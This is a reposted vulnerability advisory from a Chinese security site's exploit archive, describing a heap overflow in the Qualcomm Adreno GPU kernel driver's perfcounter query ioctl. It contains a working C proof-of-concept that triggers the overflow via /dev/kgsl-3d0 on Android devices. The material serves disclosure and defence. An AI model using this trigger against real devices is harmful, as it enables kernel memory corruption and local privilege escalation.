首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Qualcomm Adreno GPU MSM Driver perfcounter Query Heap Overflow 来源：google.com 作者：Google 发布时间：2016-02-29   /* Source: https://code.google.com/p/google-security-research/issues/detail?id=734   The Adreno GPU driver for the MSM Linux kernel contains a heap overflow in the IOCTL_KGSL_PERFCOUNTER_QUERY ioctl command. The bug results from an incorrect conversion to a signed type when calculating the minimum count value for the query option. This results in a negative integer being used to calculate the size of a buffer, which can result in an integer overflow and a small sized allocation on 32-bit systems:   int adreno_perfcounter_query_group(struct adreno_device *adreno_dev,         unsigned int groupid, unsigned int __user *countables,         unsigned int count, unsigned int *max_counters) { ...         if (countables == NULL || count == 0) {                 kgsl_mutex_unlock(&device->mutex, &device->mutex_owner);                 return 0;         }           t = min_t(int, group->reg_count, count);           buf = kmalloc(t * sizeof(unsigned int), GFP_KERNEL);         if (buf == NULL) {                 kgsl_mutex_unlock(&device->mutex, &device->mutex_owner);                 return -ENOMEM;         }           for (i = 0; i < t; i++)                 buf[i] = group->regs[i].countable;   Note that the "count" parameter is fully controlled. Setting count = 0x80000001 will result in min_t returning 0x80000001 for "t", and kmalloc allocating a buffer of size 0x4. The loop will then overflow "buf" because "t" is unsigned, i.e. a large positive value.   The bug was added in the following commit:   https://www.codeaurora.org/cgit/quic/la/kernel/msm/commit/drivers/gpu/msm/adreno.c?h=aosp-new/android-msm-angler-3.10-marshmallow-mr1&id=b3b5629aebe98d3eb5ec22e8321c3cd3fc70f59c   A proof-of-concept that triggers this issue (adreno_perfcnt_query.c) is attached. On Android devices /dev/kgsl-3d0 is typically accessible in an untrusted app domain, so if exploited this issue could be used for local privilege escalation.   */   #include <stdio.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <sys/ioctl.h>   struct kgsl_perfcounter_query {     unsigned int groupid;     unsigned int *countables;     unsigned int count;     unsigned int max_counters;     unsigned int __pad[2]; };   #define KGSL_IOC_TYPE 0x09 #define IOCTL_KGSL_PERFCOUNTER_QUERY _IOWR(KGSL_IOC_TYPE, 0x3A, struct kgsl_perfcounter_query)   int main(void) {     int fd;     struct kgsl_perfcounter_query data;     unsigned int countables[16];       fd = open("/dev/kgsl-3d0", O_RDWR);       if (fd == -1) {         perror("open");         return -1;     }       memset(&data, 0, sizeof(struct kgsl_perfcounter_query));       data.groupid = 1;     data.countables = (unsigned int *) &countables;     data.count = 0x80000001;       ioctl(fd, IOCTL_KGSL_PERFCOUNTER_QUERY, &data);       close(fd);       return 0; }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·GpicView 0.2.5 - Crash PoC ·Centreon 2.5.3 Code Execution ·Proxmox VE 3/4 Insecure Hostna ·Comodo Anti-Virus SHFolder.DLL ·Linux io_submit L2TP Sendmsg I ·ASAN/SUID Local Root Exploit ·libquicktime 1.2.4 - Integer O ·NETGEAR ProSafe Network Manage ·Core FTP Server 1.2 - Buffer O ·ATutor 2.2.1 SQL Injection / R ·Adobe Cross Site Scripting / O ·AppLocker Execution Prevention   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved